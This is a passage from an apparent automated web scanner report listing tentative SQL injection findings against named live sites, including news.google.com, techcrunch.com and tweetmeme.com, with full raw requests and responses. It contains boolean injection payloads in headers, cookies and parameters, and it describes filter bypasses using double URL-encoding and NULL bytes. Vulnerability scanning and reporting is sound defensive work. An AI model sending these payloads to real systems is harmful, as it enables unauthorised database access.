GET /news/story%00'?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddEQewEuUXr-br5MJHZzY7RO2mw5NM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d13\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIMBEKoCMAw\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=jZrs3cCWBn0xZT77GEp4ng6trYgsZovDypVU0IsvIShEZS8ZkZZAFVYAMVBEGWkAShB4zy9TehSUB3gOSm8n-qMJEzIfGt4l1DZK3SOX98F4_DqU16tL5mH6Vo98LqXN;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 23:19:03 GMT;HttpOnly
Date: Mon, 24 Jan 2011 23:19:03 GMT
Expires: Mon, 24 Jan 2011 23:19:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
mp;hl=en&docUrl=http://www.latimes.com/news/opinion/commentary/la-oe-banner-bishop-20110124,0,56458.story&docId=5979450056146080422&cid=17593850378022&title=An+amendment+rooted+in+past+failures&viewed=1295900158">
...[SNIP]...

Request 2

GET /news/story%00''?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddEQewEuUXr-br5MJHZzY7RO2mw5NM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d13\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIMBEKoCMAw\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=iDLVLHDDdWCuDQlnKKnsMpP210VjSthtUjTfyN9DO1nU2O8zHol2Uj3PMcmzQrnxg-stxmc5YfU-G2Y3nHiBdl2pUs5ek63oKtdQ2Heg3Z5mlepoDk88ayrZVhvyU4lm;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 23:19:16 GMT;HttpOnly
Date: Mon, 24 Jan 2011 23:19:16 GMT
Expires: Mon, 24 Jan 2011 23:19:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

1.36. http://news.google.com/nwshp [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://news.google.com
Path:	/nwshp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /nwshp HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=VOA5j4gKvQ1lozvn1L9GnR0vTwwvCjN_rcMbzL76tquDdSGofd54E0zij2ac7mD7QdvS1Xn95ocEtNX8SzJku0k3KFn-kjEhjOpKjrbX1OLxbuMD-IWHDPRpym6LzkuI;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 23:10:43 GMT;HttpOnly
Date: Mon, 24 Jan 2011 23:10:43 GMT
Expires: Mon, 24 Jan 2011 23:10:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
mp;hl=en&docUrl=http://www.latimes.com/news/opinion/commentary/la-oe-banner-bishop-20110124,0,56458.story&docId=5979450056146080422&cid=17593850378022&title=An+amendment+rooted+in+past+failures&viewed=1295900158">
...[SNIP]...

Request 2

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=wRRSBXwEb9ylWiQN7U3r5UHEkh8KlGuQ82ntnGF9MReGDuFr5f26Cdd_BmfC6XuPVZrIgN7RhVk2Y3e70iNw2OToQ_pD9OK_LQz7YygkGLN5Xop1Eaz5IiYBk0GJrcrs;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 23:11:00 GMT;HttpOnly
Date: Mon, 24 Jan 2011 23:11:00 GMT
Expires: Mon, 24 Jan 2011 23:11:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

1.37. http://powersportsnetwork.com/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://powersportsnetwork.com
Path:	/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: powersportsnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:50:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Pragma: no-store
Content-Length: 39258
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Cache-control: Private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Motorcycle and ATV reviews, specifications, prices, used motorcycles by PowerSports Network</TITLE><META name="desc
...[SNIP]...
<img alt='Progressive Motorcycle' src='http://www.powersportsnetwork.com/adimage.asp?ad=5&slot=PSN%20Banner&sponsor=Progressive&ordinal=1&id=25' style='border:none 0px transparent; height:90px; width:728px;'/></a></td><td width="20"></td></tr>            </table>        </td></tr></table>    </td>    </tr>    <tr>    <td height="2"><table cellspacing="0" cellpadding="0"><tr><td height="2" width="9" background="/images/psn0708_grey-bar-left.gif"></td><td width="169" bgcolor="white"></td></tr></table></td>    <td height="2" bgcolor="white"></td>    <td height="2"><table cellspacing="0" cellpadding="0"><tr><td height="2" width="168" bgcolor="white"></td><td height="2" width="10" background="/images/psn0708_grey-bar-right.gif"></td></tr></table></td></tr>        <tr>    <td width="178" valign="top" background="/images/psn0606_bar_1.gif" rowspan="2">        <table width="100%" border="0" cellpadding="0" cellspacing="0">            <tr>                <td>                    <table cellpadding="0" cellspacing="0" border="0" width="100%">                        <tr><td valign="center" class="navlink_header" background="/images/psn0606_bar_1_top.jpg">    <a class="navlink_header" href="http://www.powersportsnetwork.com/enthusiasts/default.asp">Home</a></td></tr>
                           <tr><td class="navlink_bar">      <a class="navlink_header" href="http://www.powersportsnetwork.com/enthusiasts/user_landing.asp">Members</a></td></tr>

                               <tr><td class="navlink" background="/images/psn0606_bar_1_nav.jpg">          <a class="navlink" href="https://www.powersportsnetwork.com/enthusiasts/classified_ad_signin.asp">Log In</a></td></tr>

                               <tr><td class="navlink" background="/images/psn0606_bar_1_nav.jpg">          <a class="navlink" href="https://www.powersportsnetwork.com/enthusiasts/register.asp">Register</a></td></tr
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:50:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Pragma: no-store
Content-Length: 39247
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Cache-control: Private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Motorcycle and ATV reviews, specifications, prices, used motorcycles by PowerSports Network</TITLE><META name="desc
...[SNIP]...
<img alt='Progressive' src='http://www.powersportsnetwork.com/adimage.asp?ad=5&slot=PSN%20Banner&sponsor=Progressive&ordinal=1&id=26' style='border:none 0px transparent; height:90px; width:728px;'/></a></td><td width="20"></td></tr>            </table>        </td></tr></table>    </td>    </tr>    <tr>    <td height="2"><table cellspacing="0" cellpadding="0"><tr><td height="2" width="9" background="/images/psn0708_grey-bar-left.gif"></td><td width="169" bgcolor="white"></td></tr></table></td>    <td height="2" bgcolor="white"></td>    <td height="2"><table cellspacing="0" cellpadding="0"><tr><td height="2" width="168" bgcolor="white"></td><td height="2" width="10" background="/images/psn0708_grey-bar-right.gif"></td></tr></table></td></tr>        <tr>    <td width="178" valign="top" background="/images/psn0606_bar_1.gif" rowspan="2">        <table width="100%" border="0" cellpadding="0" cellspacing="0">            <tr>                <td>                    <table cellpadding="0" cellspacing="0" border="0" width="100%">                        <tr><td valign="center" class="navlink_header" background="/images/psn0606_bar_1_top.jpg">    <a class="navlink_header" href="http://www.powersportsnetwork.com/enthusiasts/default.asp">Home</a></td></tr>
                           <tr><td class="navlink_bar">      <a class="navlink_header" href="http://www.powersportsnetwork.com/enthusiasts/user_landing.asp">Members</a></td></tr>

                               <tr><td class="navlink" background="/images/psn0606_bar_1_nav.jpg">          <a class="navlink" href="https://www.powersportsnetwork.com/enthusiasts/classified_ad_signin.asp">Log In</a></td></tr>

                               <tr><td class="navlink" background="/images/psn0606_bar_1_nav.jpg">          <a class="navlink" href="https://www.powersportsnetwork.com/enthusiasts/register.asp">Register</a></td></tr>

...[SNIP]...

1.38. http://spongecell.com/event_page/view/915725 [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://spongecell.com
Path:	/event_page/view/915725

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /event_page/view/915725 HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 502 Bad Gateway
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:19:05 GMT
Content-Type: text/html
Content-Length: 2968
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Spongecell</title>
   <meta http-equiv="Pragma" co
...[SNIP]...
<h2 class="primary">A server error has occurred.</h2>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:19:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _spongecell_loves_u=BAh7CDoJa2V5c1sAOgtsb2NhbGUiCmVuLVVTIgpmbGFzaElDOidBY3Rpb25D%250Ab250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6CW5vdGUwBjoKQHVzZWR7%250ABjsIVA%253D%253D--5f6777943aa1e5d6b4a2cab61b42984a90431a22; domain=.spongecell.com; path=/
Status: 302 Found
Location: http://spongecell.com/event/view/915725
Cache-Control: no-cache
Content-Length: 105

<html><body>You are being <a href="http://spongecell.com/event/view/915725">redirected</a>.</body></html>

1.39. http://techcrunch.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://techcrunch.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 80922731'%20or%201%3d1--%20 and 80922731'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?180922731'%20or%201%3d1--%20=1 HTTP/1.1
Host: techcrunch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 13:22:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://techcrunch.com/xmlrpc.php
Link: <http://wp.me/NaxW>; rel=shortlink
Content-Length: 124296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<link rel="icon" type="image/png" href="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/favicons/techcrunch.png?m=1268499598g" />
       <link rel="apple-touch-icon" href="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/webclips/techcrunch.png?m=1268499598g"/>
       <meta property="og:site_name" content="TechCrunch"/>                <script src='http://wordpress.com/remote-login.php?action=js&host=techcrunch.com&id=11718616&t=1295961735&back=techcrunch.com%2F%3F180922731%5C%27%2520or%25201%253d1--%2520%3D1' type="text/javascript"></script>
       <script type="text/javascript">
       /* <![CDATA[ */
           if ( 'function' === typeof WPRemoteLogin ) {
               document.cookie = "wordpress_test_cookie=test; path=/";
               if ( document.cookie.match( /(;|^)\s*wordpress_test_cookie\=/ ) ) {
                   WPRemoteLogin();
               }
           }
       /* ]]> */
       </script>
       <script type="text/javascript">
/* <![CDATA[ */
function addLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func;}else{window.onload=function(){oldonload();func();}}}
/* ]]> */
</script>
<link rel="stylesheet" href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1291749258g" type="text/css" />
<link rel='stylesheet' id='st_player_style-css' href='http://jb.speakertext.com/player/speakertext.css?ver=MU' type='text/css' media='all' />
<script> var STapiKey = 'STEMBEDAPIKEY'; var STglobalSettings = {initialState: 'open', defaultHeight: 210};</script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js?m=1283372775g&ver=MU'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://tctechcrunch.wordpress.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://tctechcrunch.wordpress.com/wp-includes/wlwmanifest.xml" />
<link rel='index' title='TechCrunch' hr
...[SNIP]...

Request 2

GET /?180922731'%20or%201%3d2--%20=1 HTTP/1.1
Host: techcrunch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 13:22:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://techcrunch.com/xmlrpc.php
Link: <http://wp.me/NaxW>; rel=shortlink
Content-Length: 124727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<link rel="icon" type="image/png" href="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/favicons/techcrunch.png?m=1265111136g" />
       <link rel="apple-touch-icon" href="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/webclips/techcrunch.png?m=1265111136g"/>
       <meta property="og:site_name" content="TechCrunch"/>                <script src='http://wordpress.com/remote-login.php?action=js&host=techcrunch.com&id=11718616&t=1295961738&back=techcrunch.com%2F%3F180922731%5C%27%2520or%25201%253d2--%2520%3D1' type="text/javascript"></script>
       <script type="text/javascript">
       /* <![CDATA[ */
           if ( 'function' === typeof WPRemoteLogin ) {
               document.cookie = "wordpress_test_cookie=test; path=/";
               if ( document.cookie.match( /(;|^)\s*wordpress_test_cookie\=/ ) ) {
                   WPRemoteLogin();
               }
           }
       /* ]]> */
       </script>
       <script type="text/javascript">
/* <![CDATA[ */
function addLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func;}else{window.onload=function(){oldonload();func();}}}
/* ]]> */
</script>
<link rel="stylesheet" href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1291749258g" type="text/css" />
<link rel='stylesheet' id='st_player_style-css' href='http://jb.speakertext.com/player/speakertext.css?ver=MU' type='text/css' media='all' />
<script> var STapiKey = 'STEMBEDAPIKEY'; var STglobalSettings = {initialState: 'open', defaultHeight: 210};</script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js?m=1283372775g&ver=MU'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://tctechcrunch.wordpress.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://tctechcrunch.wordpress.com/wp-includes/wlwmanifest.xml" />
<link rel='index' title='TechCrunch' hr
...[SNIP]...

1.40. http://trsrvr.com/x/www/delivery/ck.php [zoneid parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://trsrvr.com
Path:	/x/www/delivery/ck.php

Issue detail

The zoneid parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the zoneid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /x/www/delivery/ck.php?zoneid=378%20and%201%3d1--%20 HTTP/1.1
Host: trsrvr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:21:42 GMT
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: =%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=ffd6d0a81bbf9cf0750489d1c895bb05; expires=Wed, 25-Jan-2012 13:21:42 GMT; path=/
Location: http://uberdownloads.net/apps/free-download/free-7-zip-download-v2.php?brand=uberdownloads.net&s=google&country=US&c=uber.net_7zip_alot_pg_wb&k={keywords}&pk=7032
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /x/www/delivery/ck.php?zoneid=378%20and%201%3d2--%20 HTTP/1.1
Host: trsrvr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:21:45 GMT
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: =%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=b9fcfc411ae55970818c189d79ba68e6; expires=Wed, 25-Jan-2012 13:21:45 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

1.41. http://tweetmeme.com/story/1452917957/ [__utmv cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tweetmeme.com
Path:	/story/1452917957/

Issue detail

The __utmv cookie appears to be vulnerable to SQL injection attacks. The payloads 83547739'%20or%201%3d1--%20 and 83547739'%20or%201%3d2--%20 were each submitted in the __utmv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/1452917957/ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=83547739'%20or%201%3d1--%20; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:43 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00382399559021
X-Served-In: 0.027514934539795
X-Served-By: ded2059
Content-Length: 35059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
Wor
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=74775951654">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=74312408758" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

Request 2

GET /story/1452917957/ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=83547739'%20or%201%3d2--%20; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:45 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0041038990020752
X-Served-In: 0.025541067123413
X-Served-By: ded2059
Content-Length: 35049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
Wor
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=77835161181">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=29484591686" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

1.42. http://tweetmeme.com/story/3636556715/ [__csref cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tweetmeme.com
Path:	/story/3636556715/

Issue detail

The __csref cookie appears to be vulnerable to SQL injection attacks. The payloads 94666970'%20or%201%3d1--%20 and 94666970'%20or%201%3d2--%20 were each submitted in the __csref cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/3636556715/ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
